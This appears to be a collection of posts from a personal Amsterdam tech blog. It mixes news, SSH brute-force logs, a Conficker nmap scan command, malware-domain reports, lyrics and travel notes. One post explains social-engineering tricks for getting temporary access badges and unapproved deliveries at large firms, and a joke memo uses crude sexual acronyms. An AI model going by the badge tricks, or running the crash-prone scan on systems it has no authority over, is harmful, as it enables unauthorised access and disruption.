mokum von Amsterdam

Hamas: Israel distributes libido-increasing gum in Gaza

Islamist group claims Israeli intelligence operatives transfer merchandise to Gaza dealers that increases sex drive, even encourage them to distribute them free of charge in order 'to destroy' young generation. Affair exposed after young girl chews gum, complains of bizarre side effects

Is Israel targeting the Palestinian population in Gaza by distributing libido-increasing chewing gum in the Strip? A Hamas police spokesman in the Gaza Strip Islam Shahwan claimed Monday that Israeli intelligence operatives are attempting to "destroy" the young generation by distributing such materials in the coastal enclave.

Shahwan said that the police got their hands on gum that increases sexual desire that, according to him, reaches merchants in the Strip by way of the border crossings. According to him, a Palestinian drug dealer admitted that he sold products that increase sex drive. The dealer said that he received the materials from Israeli sources by way of the Karni crossing.

A number of suspects have been arrested.

The affair was exposed when a Palestinian filed a complaint that his daughter chewed the aforementioned gum and experienced the dubious side effects.

Shahwan even claimed that Israeli intelligence operatives encourage dealers in Gaza to distribute the gum for free.

"The Israelis seek to destroy the Palestinians' social infrastructure with these products and to hurt the young generation by distributing drugs and sex stimulants," said Shahwan.

However, he noted that drugs reach the Gaza Strip by way of Rafah tunnels, and said that the police keep a close watch on the illegal activities going on in the tunnels between Gaza and Egypt.

Shahwan added that the police have recently seized large amounts of drugs and alcohol attached to the underside of automobiles passing through Erez crossing. The automobile owners admitted receiving help for smuggling the materials from Israeli intelligence operatives.

Ali Waked

Israel News

# grep "129.34.3.3" /var/log/messages

Jul 11 15:31:50 meij sshd[19894]: Failed password for root from 129.34.3.3 port 35477 ssh2

Jul 11 15:31:51 meij sshd[19896]: Failed password for root from 129.34.3.3 port 35702 ssh2

Jul 11 15:31:52 meij sshd[19898]: Failed password for root from 129.34.3.3 port 35873 ssh2

Jul 11 15:31:53 meij sshd[19900]: Failed password for root from 129.34.3.3 port 36003 ssh2

Jul 11 15:31:54 meij sshd[19902]: Failed password for root from 129.34.3.3 port 36177 ssh2

Jul 11 15:31:55 meij sshd[19904]: Failed password for root from 129.34.3.3 port 36332 ssh2

Jul 11 15:31:57 meij sshd[19906]: Failed password for root from 129.34.3.3 port 36462 ssh2

Jul 11 15:31:57 meij denyhosts: Added the following hosts to /etc/hosts.deny - 129.34.3.3 (vserv.watson.ibm.com)

Jul 11 15:31:58 meij sshd[19913]: Failed password for root from 129.34.3.3 port 36666 ssh2

Jul 11 15:31:59 meij sshd[19915]: Failed password for root from 129.34.3.3 port 36795 ssh2

Jul 11 15:32:00 meij sshd[19917]: Failed password for root from 129.34.3.3 port 36937 ssh2

Jul 11 15:32:01 meij sshd[19919]: Failed password for root from 129.34.3.3 port 37086 ssh2

Jul 11 15:32:02 meij sshd[19921]: Failed password for root from 129.34.3.3 port 37215 ssh2

Jul 11 15:32:03 meij sshd[19923]: Failed password for root from 129.34.3.3 port 37333 ssh2

Jul 11 15:32:04 meij sshd[19925]: Invalid user oracle from 129.34.3.3

Jul 11 15:32:04 meij sshd[19925]: Failed password for invalid user oracle from 129.34.3.3 port 37454 ssh2

Jul 11 15:32:05 meij sshd[19927]: Invalid user test from 129.34.3.3

Jul 11 15:32:05 meij sshd[19927]: Failed password for invalid user test from 129.34.3.3 port 37538 ssh2

Unfortunatly there is more amiss at IBM's Watson Research Center:

The original message was received at Mon, 13 Jul 2009 09:11:05 -0400
from spamguru010.watson.ibm.com [9.2.250.70]

----- The following addresses had permanent fatal errors -----
< nrt@watson.ibm.com>
(reason: 550 Host unknown)

----- Transcript of session follows -----
554 5.0.0 Service smokum@gmail.com unknown
550 5.1.2 <nrt@watson.ibm.com>... Host unknown (Name server: -f: host not found)

Final-Recipient: RFC822; nrt@watson.ibm.com
X-Actual-Recipient: RFC822; nrt@mailhub4.watson.ibm.com
Action: failed
Status: 5.1.2
Remote-MTA: DNS; -f
Diagnostic-Code: X-Unix; 550 Host unknown
Last-Attempt-Date: Mon, 13 Jul 2009 09:11:06 -0400

So I guess they'll need to read this blog to find out about their issues ;)

Good luck

Downloading data via USENET has become the default FAST track for most DSL|Cable users. The data is nicely placed 'locally' and for a small fee, one gets priority access for 4, 8 or however many connections. Nice. Much faster then the old single-sourced-http access or the newer multiple-source-bittorent [too many cheaters in bittorent country who who do not obey to the rule that one should at least have a share ratio of 1:1.20 or better].

Cool, so now we finally get to use all the bandwidth we pay the ISP for. But since the USENET servers are useualy close to the endpoint, the need for a connection oriented protocol like TCP is hard to make. UDP is a cheaper protocol and thus could increase the effective bandwidth since it requiers less 'overhead'. The old fasioned reasoning for using TCP over UDP is that UDP is only usefull for transmissions where order isn't important and you don't need all of the messages to get to the other machine.

Other reasons for using TCP over UDP are that the upstream application needs less state awareness and since we like our coders dumb, we take that burden off of them.

But since our USENET servers are close, packetloss is not much of an issue. It is far more exceptional to loose packets. In the rare case we do, we could simply ask for a resent of that particular packet [or block].

So I went to BING [I have to admit I am impressed by the google-like results!] and asked "when is tcp better then udp" Hardly anything interesting showed at first glance. I repeated the same question to GOOGLE, more 'good' material was listed at first, but still not what I was looking for. BING has been setup to give me 100 results so I took a second look and found at hit 38 tsunami-udp.

In pseudo-code, the server and client operate approximately like this:

**Server**

start

while(running) {

wait(new incoming client TCP connection)

fork server process:

[

check_authenticate(MD5, "kitten");

exchange settings and values with client;

while(live) {

wait(request, nonblocking)

switch(request) {

case no request received yet: { send next block in sequence; }

case request_stop: { close file, clean up; exit; }

case request_retransmit: { send requested blocks; }

}

sleep(throttling)

}

]

}

**Client**

start, show command line

while(running) {

read user command;

switch(command) {

case command_exit: { clean up; exit; }

case command_set: { edit the specified parameter; }

case command_connect: { TCP connect to server; auth; protocol version compare;

send some parameters; }

case command_get && connected: {

send get-file request containing all transfer parameters;

read server response - filesize, block count;

initialize bit array of received blocks, allocate retransmit list;

start separate disk I/O thread;

while (not received all blocks yet) {

receive_UDP();

if timeout { send retransmit request(); }

if block not marked as received yet in the bit array {

pass block to I/O thread for later writing to disk;

if block nr > expected block { add intermediate blocks to retransmit list; }

}

if it is time {

process retransmit list, send assembled request_retransmit to server;

send updated statistics to server, print to screen;

}

send request_stop;

sync with disk I/O, finalize, clean up;

}

case command_help: { display available commands etc; }

}

It combines the strength of TCP [reliable data transfer] with the efficiency of UDP [no handshakes etc].

How It Works:

Tsunami performs a file transfer by sectioning the file into numbered blocks of usually 32kB size. Communication between the client and server applications flows over a low bandwidth TCP connection. The bulk data is transferred over UDP.

Most of the protocol intelligence is worked into the client code - the server simply sends out all blocks, and resends blocks that the client requests. The client specifies nearly all parameters of the transfer, such as the requested file name, target data rate, blocksize, target port, congestion behaviour, etc, and controls which blocks are requested from the server and when these requests are sent.

Someone thought it a good idea to help African people in & outside Africa and to do so, collect money from others. But how to get people to give you money? Well, one soft target are kids. So when you have a volunteer working for you who is linked to a school, why not use that opportunity?

So you register a site, copy the content [one page] of another site and sit back watching the kids donating money. Simple & potentially effective. Until a parent gets a little suspicious and decides to contact the school and ask them what this is all about. As it happens, the school knew as little as what the copied one paged website let them know: nothing really.

Another parent used some who is, some google-fu, some Maltego & some RL contacts in the fraud business. Everything found smells fishy, except the person who claims to be behind the Peace Future School. They go to extended lengths to assure the doubters that all is very legit, all is being done in good faith, there is no official registration YET, but surely that will be done one day, there is no content for the site YET but that too is on it's way, there are many trustworthy people behind the project but not one links from their site to the Peace Future School YET but that will surely come.

But what is the truth? Is it just a bunch of innocent people who do not know how to setup a reliable looking site or are they fraudsters? I leave the verdict up to you, but for my kids there is no way they are going to be giving money to this particular initiative. No matter how much private money the spokeswoman claims to have spend on it, no matter how many well connected people she claims are behind it, no matter how strange and surprising it was to all volunteers that people are doubting, no matter how sad it makes her Nigerian partners to be confronted with suspicion, no matter how many volunteers are emailing from free email addresses.

The people behind this will not make the same mistake again. They now will get some links to and from the site, and some content, change the graphics, list some names, do some more foot work and all that jazz. They learned from the incident and will not make the same mistakes. So for the next person who gets contacted and who does some online research, it will get harder to find in dices. That is worrying and reminds me of an experiment of the people behind Fake Trust.

"Remember the story about how you are going to be able to order coffee at Starbucks through the iPhone and then pay at the counter? 2 Think bigger. The new iPhone 3.0 operating system and its push notifications and the in-app commerce features and abilities to pay through your account at the iTunes store, could completely change the way you shop. As you walk into any store, you could browse information about their products, order and pay and maybe have the goods delivered to your home, without having to stand in line and all the usual hassle associated with shopping. It is like on-line ordering with the added benefit of being able to squeeze, smell, and try out the products. The rumored improved camera with autofocus enables bar-code scanning. Sit in a comfy sofa at IKEA, order it, and that’s it. You just walk out. Or you could pick the goods up as you leave."

source

Still a little rough around the edges, but who knows.

Listen, son: I am saying this as you lie asleep, one little paw crumpled under your cheek and the blond curls stickily wet on your damp forehead. I have stolen into your room alone. Just a few minutes ago, as I sat reading my paper in the library, a stifling wave of remorse swept over me. Guiltily I came to your bedside.

There are the things I was thinking, son: I had been cross to you. I scolded you as you were dressing for school because you gave your face merely a dab with a towel. I took you to task for not cleaning your shoes. I called out angrily when you threw some of your things on the floor. At breakfast I found fault, too. You spilled things. You gulped down your food. You put your elbows on the table. You spread butter too thick on your bread. And as you started off to play and I made for my train, you turned and waved a hand and called, "Goodbye, Daddy!" and I frowned, and said in reply, "Hold your shoulders back!" Then it began all over again in the late afternoon.

As I came up the road I spied you, down on your knees, playing marbles. There were holes in your stockings. I humiliated you before your boyfriends by marching you ahead of me to the house. Stockings were expensive-and if you had to buy them you would be more careful! Imagine that, son, from a father! Do you remember, later, when I was reading in the library, how you came in timidly, with a sort of hurt look in your eyes?

When I glanced up over my paper, impatient at the interruption, you hesitated at the door. "What is it you want?" I snapped. You said nothing, but ran across in one tempestuous plunge, and threw your arms around my neck and kissed me, and your small arms tightended with an affection that God had set blooming in your heart and which even neglect could not wither. And then you were gone, pattering up the stairs.

Well, son, it was shortly afterwards that my paper slipped from my hands and a terrible sickening fear came over me. What has habit been doing to me? The habit of finding fault, of reprimanding-this was my reward to you for being a boy. It was not that I did not love you; it was that I expected too much of youth. I was measuring you by the yardstick of my own years. And there was so much that was good and fine and true in your character. The little heart of you was as big as the dawn itself over the wide hills. This was shown by your spontaneous impulse to rush in and kiss me good night. Nothing else matters tonight, son. I have come to your bedside in the darkness, and I have knelt there, ashamed! It is feeble atonement; I know you would not understand these things if I told them to you during your waking hours. But tomorrow I will be a real daddy! I will chum with you, and suffer when you suffer, and laugh when you laugh. I will bite my tongue when impatient words come. I will keep saying as if it were a ritual: "He is nothing but a boy-a little boy!" I am afraid I have visualized you as a man. Yet as I see you now, son, crumpled and weary in your cot, I see that you are still a baby. Yesterday you were in your mother's arms, your head on her shoulder.

I have asked too much, too much.

I can not access the page you are looking at with my most favorite browser: Firefox. It crashes Firefox v3.0.10, released April 27, 2009.

When you search for blog crashes firefox, the second link points to a story about Rob Levin's Spinhome blog crashing FF 1.5.0.2. In 1.5.0.3 it seemed to be fixed.

For me it happens not to be FF itself, but the addon NoScript, that I can not browse without anymore.

Who's there? I know I am, I know Craig Balding is and Roelof Temmingh & Chris Bohme are, but will you?

This action packed and kick ass conference will show you where the community is at and what to expect in the [not so] near future. A -must- for IT [security] people who take their jobs serious.

Not just the presentations but the informal meeting opportunities in & out side bars and rooms make BlackHat Europe so special. It's much smaller and more intimate then Los Vegas etc. This is one important reason speakers like it here so much. Not to mention the opportunity to explore this magical city with is struck by a wave of the best weather in a loooong time.

View Larger Map

One of my best friends is due to get a 'new' kidney, today. Just like hosting a new service. New is relative here since the market for new grown kidneys is not that big so he gets one second hand, from his wife. Like using that compiled distributed application. While they spend time unconscious under the capable hands of one team of doctors, their 3 year old spends time at our house. Like having freelancers watching over your databases.

There is a lot of risk involved in the whole kidney transplantation deal. He will get a 'strange' organ implanted and his immune system will fight it to its or their death. Like your antiviral software battling a smartly written Trojan. To prevent this from succeeding he will be taking medication to reduce the effectiveness of his immune system, which in itself opens him up to a whole range of new dangers. Like placing a very large do not scan mask. See it as DMZ's or even extranet connectivity.

But before he gets anything, she will have to give. Like opening up your tightly secured local network. She's a healthy woman in the flowering ages and has absolutely 0 health issues. Like your internal NetWare file server. She's taking a statistically small risk, kidneys get removed and people operated by the 1.000 everyday. Like hosting your own domain. Still, statistics mean little in individual cases since either you live or you die, a rather back and white situation. Like the compromise of your network with a 0 day.

The risk person in us [we do sort of the same kinda work] made us prepare for the worst. Like a BCP for an earthquake in a country like Holland. They have officially made me guardian of the little them. I have full control over all their assets. Like having the root passwords. Just in case. You never know. The scenario of him kicking the bucket, they both not waking up and whatever other terrible scenarios have been discussed, face to face and measures have been taken to assure live will be as good as possible for friend 2.0.

What can and needs to be arranged officially has been done. A will has been made, signed and sealed. List with invites & a formal chain of command have been made. Famous last words have been written. Religious & family matters been taken into account. Everything has been encrypted and securely distributed. The key hidden in Google's cache.

We also have friends over from a country where we lived for a couple of years.

Black Hat Europe will start for me tomorrow and my youngest daughter will go on her first real school holiday trip.

Later today the operation's team leader will call me to inform me of the preliminary results and I have been assigned the task to inform the selected family members, friends & colleagues.

Unless something goes dramatically wrong: then the phone will ring earlier.

Business as usual, nothing to see here, please move on.

Google hosts a great club of smart people who do all sorts of groovy things. One of them is the "Safe BrowsingDiagnostic". You can check sites yourself to [use this]

What happened when Google visited this site?

Of the 2709 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-04-10, and the last time suspicious content was found on this site was on 2009-04-10.
Malicious software includes 1 scripting exploit(s), 1 trojan(s). Successful infection resulted in an average of 8 new process(es) on the target machine.
Malicious software is hosted on 3 domain(s), including v3i9.cn/, nvi3.cn/, said7.com/.
2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including 74.125.77.0/, said7.com/.
This site was hosted on 4 network(s) including AS15169 (GOOGLE), AS26230 (TOTTAWA), AS6130 (ADN).

browsing google.com is not a safe idea anymore!

ING is not doing too well, not to say bad. Lots of hocus pocus with your [and mine] money of the past couple of years have led to the current drama unfolding. This whole 'financial turmoil' might look far away from decent people's beds but it is not.

Since 2 hours the internet site for money transfers is not working, and greets you with "Welcome Null" what a great way to show your customer something 'technical' is wrong!

When I spoke to the helldesk for normal customers the lady told me there was a power issue in Amsterdam caused by the NUON. My [former] colleages told me the power issue is in Rotterdam and the IBM mainframes & access switches went of the radar about 2 hours ago.

The largest local newspaper quoted an ING spokesperson saying "We do not know what the issue is at the moment"

All of this is not so bad if the issue happened 'any other normal day' but ING's luck or mismanagement make things look extra scary since they released a press note stating they are dropping 10 of the 12 [!!!] business units not directly related to banking.

Killing the super successful no nonsense Postbank right in the middle of the financial crisis was a bad stroke of luck, but as so often, when things start going wrong, they go very wrong. I hope for you you have taken measures that the actions of the management of this bank will not affect you and your loved ones too bad, because more news is in the making...

EDIT:
And of course things that 'go wrong' can be hilarious too. Here rally champion sjeik Mohamed Bin Sulayem in the ING sponsored F1:

Get latest nmap (4.85BETA6 at the moment of writing) from:

http://nmap.org/dist/?C=M&O=D

run:

sudo nmap -sC --script=smb-check-vulns --script-args=safe=1 -p445 \
-d -PN -n -T4 --min-hostgroup 256 --min-parallelism 64 \
-oA conficker_scan

It is important to note that scanning for Conficker has the small chance of crashing an unpatched host. Patched and infected hosts won't be crashed though. Note that if Conficker scans unpatched hosts they are even more likely to crash than with this check so the benefits probably outweigh the drawbacks.

Find the source here.

It's been... seven hours... and fifteen.. days
since you took... your love away
I go out... every night... and sleep all.. day
since you took... your love away
since.. you've been gone... I can do... whatever I want
I can do... whatever.. I choose
I can eat.. my dinner.. in a fancy.. restaurant
but nothing... can take away.. these blues
nothing compares
nothing compares.. to you

It's been.. so lonely... without.. you here
like a bird... without.. a song
nothing.. can stop... these lonely tears...
tell me baby...  where did I. go wrong?
I could.. put my arms... around every girl I see
but they'd all... remind me. of you
I went.. to the doctor... guess what he.. told me
said you'd better have some fun
no matter what you do,
nothing compares
nothing compares... to you

All the flowers.. that you planted..
in the backyard
all died.... when you went.. away
I know that.. living with you.... was sometimes hard
but I'm willing.... to give it a try

nothing. compares
nothing compares... to you
nothing compares
nothing... compares... to you
nothing compares
nothing.. compares to you
nothing compares
nothing compares... to you
nothing compares
nothing.. compares... to you

For years I have been an addict and huge fan of the best chocolates in the world that are locally produced and sold in... Amsterdam. The company is called Puccini and has two shops. One conveniently located 5 minutes cycling from my home. Luckily the route to work does not take me past that shop so we have enough money left to buy real food too.

As I am on an assignment in Istanbul, I like to bring some 'typical' dutch presents with me to break the ice and compensate for all the presents and gifts I get from my colleagues when abroad. Stroopwafels are a safe bet, no matter where you go, as long as care is taken in warm climates in regards to transportation and the stains the syrup leaves.

Much to my surprise I was offered 'dutch chocolate' today while at the coffee break. For me, Dutch chocolate == Puccini. Nice! What an excellent start of the day!

Even more surprised I was when I found that the 'Dutch chocolate' was actually drop!

Drop makes me drool [Pavlof sends his greetings] but I am not that much a fan of it, but it is fun to see how not Dutch people react to it. Like haring, it is something you have to grow up with to like.

De nederlandse pop dichter Ton Lebbink is een held, tenminste, dat vind ik en een groeiend aantal andere. Ik heb natuurlijk al zijn platen, maar mijn pogingen om er fatsoenlijke mp3's van te maken zijn schromelijk mislukt. Gelukkig zijn ze te koop bij Fonos.

Nog toffer is dat veel van Ton Lebbink's werk nu ook op YouTube te vinden is om eens te luisteren voor het geval je het nog niet kent.

Boodje Brood is ook actief bezig met Ton Lebbink [en nog meer interesants].

Dus bijdeze mijn luister tip:

Dear employees,

Due to the current financial situation caused by the slowdown of the economy, Management has decided to implement a scheme to put workers of 40 years of age and above on early retirement. This scheme will be known as RAPE (Retire Aged People Early).

Persons selected to be RAPED can apply to management to be eligible for the SHAFT scheme (Special Help After Forced Termination). Persons who have been RAPED and SHAFTED will be reviewed under the SCREW programme (Scheme Covering Retired Early Workers). A person may be RAPED once, SHAFTED twice and SCREWED as many times as Management deems appropriate.

Persons who have been RAPED can only get AIDS (Additional Income for Dependants & Spouse) or HERPES (Half Eamings for Retired Personnel Early Severance).

Obviously persons who have AIDS or HERPES will not be SHAFTED or SCREWED any further by Management.

Persons who are not RAPED and are staying on will receive as much SHIT (Special High Intensity Training) as possible. Management has always prided itself on the amount of SHIT it gives employees. Should you feel that you do not receive enough SHIT, please bring to the attention of your Supervisor. They have been trained to give you all the SHIT you can handle.

Sincerely, The Management

When people I know start talking about 'hacking' in the original mean of the word [making things happen by means that it was not designed for], we most of the time stick to some technical mumbo jumbo, as the boss likes to call it.

That is something our whole industry likes to do. Did and does. No matter how many times we get bitten in the arse by people doing things wrong, we like to forget about the art of social engineering, simply because it is too difficult to do something about and because it does not sell boxes that smell nice because they are new.

I have spend quite some time working for|in|with large organizations and these are the places where social engineering works best. Employees do not know each other, low raking employees have been given a bullucking by their 'superiors' for sticking to the rules, etc.

The bigger the organization, the larger the piles of documentation with rules and exceptions. Fertile ground for those who want to get things done, their way :P

Getting access to buildings is easy, specially with the no smoking inside. Every company has a percentage of people who are addicted and these people -will- find ways to get out & in without too much hassle. Be it the emergency exit, be it a rooftop, but like water: they will find a way.

A novel trick I found lately was that after some of the smokers who used to leave via the front door but where called into the managers office after he'd seen the in-out time table, is getting a visitors pass for walking in & out unregistered. Smart. Of course I had to try to see how difficult it was to get one of those: frighteningly simple. Since so many had explained the situation with the security people, showing a packet of cigarettes was enough to trigger the knee jerk reaction of handing out a temporay access badge.

The same happens with the ordering process. Since all has been 'centralized' and 'standardized' it might take up to 6 months to get an order through [correct, this is a very bad and seldom example]. Because the supplier knows and has been trained to deliver orders before the paper work is 'completed', it is trivially simple to get any kind of hard & software shipped without passing the regular process. Most of the time the supplier will get his formalized order some time later but when he doesn't he just faxes the delivery notification to the ordering department and since they are used to things to go wrong, will send him a proforma so he will be able to bill.

More of the same is with changes to infrastructure. Since all self respecting organizations have CABs [Change Advisory Boards], where as we all know the most anal & inexperienced people waste their time, that take forever to approve the most basic changes but will happily waver changes with impact beyond the minimal description. This is how 'the insiders' get things done: there old an trusted social network.

In the role of PM or as auditor I do the same. I spend a large part of my time setting on desks, hanging around the coffee machine, lunching with [key-] people from the departments that actually do things. By constant name dropping and revering to 'john from RM', by reinforcing the well known fact that the official processes 'do not work' and 'the last reorganization undid the one before', confirming that 'the management' costs & wastes money, this way I get my rules, my connections, my targets met and implemented.

So if you get all exited when you find company xyz is still running that well knows bugged version of the Internet facing software, remember that I get the same happy feelings when I see people with ties and temporary badges :P

EDIT: Found people who actually give classes http://secinmotion.blogspot.com looks good.

You gotta love the importance of the infra and the huge dependency on everybody playing nice, or better, knowing what they are doing.

Yesterday a tiny little outlet called SUPRO, spol. s r. in the middle of nowhere called Hradiste CZ, who manage AS 47868, blacked out part of the oh so crucial Internet. This was done [for all we know] without any bad intentions but Fast Fingered Freddy did manage to cause a stir in the smooth user experience our beloved browsers are so used to.

As shown here there where a couple of countries suffering of their outdated routers but users of all countries might have traffic passing these.

Ah, nice! Time to get some laughs and warm feelings about 'bad' things.

The movie lifting [insider story of a friend of mine who worked over at a video rental and who told me he hired movies that he never brought back] Quentin Tarantino makes a new movie.

Chopping up Nazi's is a cool thing, in whatever way, shape or form so I am looking forward to the torrents in May :P

It's easy to sit back and watch TV, read a newspaper and forget about the hardship real people have to go through to [attempt] to bring peace & safety to a young nation.

There is a simple way to express your worldly appreciation to those that do the work.

Note: this is NOT written by me, you can tell, too well worded and it even makes sense. This is all written by Cormac O'Reilly and published at the world famous TheRegister.

As Sodor wakes to a new year, Thomas and his friends notice some very disturbing things...

The end of the IT world train is arriving at platform one

Cheaper hardware and software prices in 2009 means that IT becomes an increasingly throwaway business. We're there with printers, and other plug-ins: expect much the same with PCs, small servers, most storage and productivity software.

Software has gone from purchase, to rental, to free open systems and is now rapidly moving to online service. But the growing mindset is to load up on low-cost standby equipment, and scrap the original when it goes wrong. In this environment, the clever IT specialist and expensive performance monitoring tools have less and less to do.

Forget complex processor technology or clever storage solutions. Install massive redundancy of cheap commodity gear. Google pioneered this approach in building its (and the world's largest) IT infrastructure, and established that this pays big dividends and provides incredible performance. Expect this express train to arrive in 2009 and pick up more and more passengers. Don't be surprised if Google is not just the driver, but owns the railway company.

Base-line IT services hit the buffers

Talking of Google the Tank, expect a corporate flight to its Apps and productivity tools (like Gmail) in 2009.

Google has positioned itself to be in this business, just as Amazon did in running other companies' electronic shops. Many of the big corporate names have been tire kicking Google services for months. It's obvious that they are well run, highly reliable and accessible. Commodity "dial tone" services offer better quality, performance and capability that anything the traditional legacy players can supply, and make in-house provision of these services economically laughable.

Clever old Google provides ever better tools to migrate corporate services to its platform. These tools get easier to use, introduce stellar security and avoid the need for - gasp - overpaid IT people, complex software and expensive infrastructure. Expect these services to go the way of payroll. This was once a must in-house application, now it is a must outsource.

The trains leaving for Asia is loaded with bundled back office services

Expect Asian outsourcers to climb over the European and US traditional outsource players (like EDS/HP and Accenture) and in-house IT organizations, and sell directly to administrative corporate functions in 2009. They already provide the people-centric intellectual IT engines of the world. So why should they not get as much of the margin as possible?

Call centers are a thing of the past - application software maintenance is increasingly low margin, so expect pressure for bundled back office operations - that's transaction touch, rather than customer touch. I expect 2009 will be the beginning of the end of in-house IT services.

Remember, if you are not adding clear value, then you must be adding pure cost. And the tolerance for this will be thinner than atomic particles in 2009 and beyond.

I suspect few legacy IT companies or old world IT Departments are ready to cope with this uncomfortable scenario, even though they know it is on the horizon. With the global economy providing the heat, and businesses laser-focusing on cost, expect this little chemical reaction to drastically speed up 2009.

The passengers are revolting

Just about every major company funds a junkyard of application systems and technologies attached to them. Few have had the incentive to fix this, much to the consternation of corporate IT departments. Remember the IT cost justification for that ERP system - all those systems that it would replace, but somehow never did. And recognize the fact that this residue of junkyard legacy counts for a big part of the IT budget, and generates lots of operational inefficiency.

Depression-level economics will force line managers to actually take charge of this expense they unknowingly caused. Expect systems on which the company is apparently so dependent to go, and with them much of the IT junk. As a result, expect a lot of high margin break/fix work that propped up the cash flow of legacy IT companies to disappear.

The Fat Controllers lose patience

Senior managers have moved from being in awe of IT's potential, to deep disappointment at its lack of pay-off. About now, expect them to figure out that process engineering etc. needs to go - see Asian Back Office above. Once this mindset starts, expect to see a whole different senior management attitude.

Google and Microsoft, both at their core, are people productivity-centric, and will likely play a much bigger front office productivity role - look at Google's Gears and Microsoft's front office re-emphasis. Watch the gathering rush to bundle solution technology between front office (which these guys own) and back office (which Asian outsourcers will increasingly own). What's left is innovation and application - good luck with that, IT boys and girls. That's a whole different world, and one that few IT grunts have ever lived in.

Finally, the wrong kind of snow on the lines

Expect high margin networking equipment companies to fall to earth. Increasingly, when dealing with procurement departments, expect them to fail to explain that products from the likes of D-Link that cost a fraction of their price, but have the same specs, are inferior. Hey, we all know they have the same basic building block components, work to the same standards and are already at throwaway prices.

And don't expect our pals at the telephone companies to hold the line. They are up to their ass in fiber, broadband and shortly WiMax, while consumers drain the landline and traditional phone services swamp. If you don't believe it - then use Magic Jack to provide your unlimited telephone and fax services in the USA for $20 a year. YES - TWENTY BUCKS A YEAR!

And as night falls on the Island of Sodor, Thomas and his friends worry about the scrap heap....

This little vanity blog is getting at least some hits from you guys [thanks!] and I thought it would be nice to share with you what you are looking for, at least when you are using your google fu:

1. google street view amsterdam
2. mokum von amsterdam
3. amsterdam iphone
4. street view amsterdam
5. firefox fullscreen os x
6. "put your mouth where your money was"
7. google street view netherlands
8. failed keyboard-interactive/pam for invalid user
9. amsterdam street view
10. forgotten hope 2.0.rar

And from google you came:
1. google 2,257
2. yahoo 19
3. aol 17
4. search 13
5. altavista 4
6. msn 2
7. lycos 1
8. netscape 1

You love my root and it shows:
1. / 2,629
2. /2008/07/google-car-in-amsterdam-holland.html 293
3. /2008/01/sound-noise-good-neighbours.html 280
4. /2008/08/best-things-in-life-are-free.html 188
5. /2007/09/bring-it-on.html 182
6. /2008/05/ssh-brute-force-botnet.html 147
7. /2008/08/pdps-older-mailbox-volumes-compromized.html 114
8. /2008/03/firefox-fullscreen-on-osx.html 110
9. /2007/09/full-body-scan.html 99
10. /2008/07/battlefield-2-new-patch-15-and-3-new.html 86

Your tools? As expected:
1. Firefox
2. Internet Explorer
3. Safari [iPhone's I am sure]
4. Opera
5. Mozilla
6. Chrome
7. Mozilla Compatible Agent
8. Netscape
9. Camino
10. HPiPAQ910

Your OS:
1. Windows 3,340 77.19%
2. Macintosh 745 17.22%
3. Linux 175 4.04%
4. iPhone 41 0.95%
5. (not set) 14 0.32%
6. FreeBSD 5 0.12%
7. SunOS 3 0.07%
8. SymbianOS 3 0.07%
9. Nintendo Wii 1 0.02%

Hope this satisfies your never ending lust for facts & figures.

Blowing out candles is sooo 2007!

1. Take into account that great love and great achievements involve great risk.

2. When you lose, don't lose the lesson.

3. Follow the three R's:
Respect for self
Respect for others and
Responsibility for all your actions.

4. Remember that not getting what you want is sometimes a wonderful stroke of luck.

5. Learn the rules so you know how to break them properly.

6. Don't let a little dispute injure a great friendship.

7. When you realize you've made a mistake, take immediate steps to correct it.

8. Spend some time alone every day.

9. Open your arms to change, but don't let go of your values.

10. Remember that silence is sometimes the best answer.

11. Live a good, honourable life. Then when you get older and think back, you'll be able to enjoy it a second time.

12. A loving atmosphere in your home is the foundation for your life.

13. In disagreements with loved ones, deal only with the current situation. Don't bring up the past.

14. Share your knowledge. It's a way to achieve immortality.

15. Be gentle with the earth.

16. Once a year, go someplace you've never been before.

17. Remember that the best relationship is one in which your love for each other exceeds your need for each other.

18. Judge your success by what you had to give up in order to get it.

19. Approach love and cooking with reckless abandon.

/dev/tty.PL2303-00001004
==
http://osx-pl2303.sourceforge.net/
+
Prolific PL2303 USB serial adapter

Made possible by Calico. What a kick ass tool!

WOW! Was my first impression when I coincidentally walked into [read 'Paradise Lost' for some history on the name] the work of the Istanbul based artist Faruk Yazicilar.

WOW! What a strong image, such constrained but strong expressions.

I would really like to meet this man and see more of his work and if all works out: get one as a present to my beloved.

If only there was more of his work online, till the time I meet him...

And on a site note: why the sudden interest late october from telia stofa a/s, opal telecommunications internet service provider and the arts institute at bournemouth for my domains do know evil?

Forget the slick and expensive gold bling bling crap!

The Nixie Watch is the real deal and the only thing one can give a true geek.

Made by a super geeky dude who is into cathodes like a tornado is into trailer parks, this watch is something I can no longer live without.

It is the same on all new machines: it takes a while to get it look & feel like you like it most.

The patches
FireFox plus noscript & adblock
xcode
darwinports
wget
nmap
mtr
unrar
wireshark
Skype
iWork
Picasa Web Albums Uploader
Crossover
Visio
Google Earth
fugu

And then some, but by the time this is done... man!

More:
vmware
roxio toast
wow
rEFId
BackTrack

And more later.

More like:
tuntap
HandBrake

BU SİTEYE ERİŞİM ENGELLENMİŞTİR

Eskişehir 2. Sulh Ceza Mahkemesi, 23.11.2007 tarih ve 2007/1705 nolu kararı gereği bu siteye erişim TELEKOMÜNİKASYON İLETİŞİM BAŞKANLIĞI'nca engellenmiştir.

Access to this web site is banned by "TELEKOMÜNİKASYON İLETİŞİM BAŞKANLIĞI" according to the order of: Eskişehir 2. Sulh Ceza Mahkemesi, 23.11.2007 of 2007/1705.

So let's talk about the good stuff in Istanbul. The free people. The scene that has [a little more] money and knows where to go.

The evening started of at a friends place. He rents an apartment in the groovy district Cihangir. It has everything one could want from a [temporary] place. Lovely old paintings on the stairways, where the teeth of time have left there marks, the stains of water leaking and many a dent of all the people and goods going up and down in the never ending struggle for life and security.

The details in the apartment all tell a story or two. About the original intent and the good & the bad. The attempts to improve or to restore. All have left their traces.

Later that night I went to a place called 5.Kat [in English: the fifth floor]. What a lovely view! Great view over the Bosporus and an even better crowd. Then enters the owner: Yasemin Alkaya. She just to work as an actress and now runs one of the hottest bars|restaurants in town.

She cooks, waiters, hosts and entertains her guests with such ellegance and style that it was love at first sight for me. I will be back here, as often as I can.

Other places:
Sabahattin Fish!
Develi Kebab
Changa International
Ulus 29 see and be seen

With thanks to Erdal Gökyıldırım for his tips and comments :D

Be fearful when others are greedy, and be greedy when others are fearful.

